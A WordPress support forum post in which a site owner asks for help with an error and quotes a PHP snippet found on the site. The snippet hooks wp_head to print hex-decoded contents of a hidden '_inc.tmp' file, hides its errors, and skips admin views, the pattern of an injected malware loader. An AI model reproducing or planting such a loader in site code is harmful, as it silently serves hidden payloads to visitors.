• Hi all!

    As written in the title, an error appears on my site which is the following:

    if ((is_admin() || (function_exists(‘get_hex_cache’))) !== true) { add_action(‘wp_head’, ‘get_hex_cache’, 12); function get_hex_cache() { return print(@hex2bin( ‘3c7′ . (file_get_contents(__DIR__ .’/_inc.tmp’)))); } }

    I can’t found anything online and any solutions..

    Can please anyone help me?

    Thanks,
    Erik

    The page I need help with: [log in to see the link]

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘A critical error has occurred on your website.’ is closed to new replies.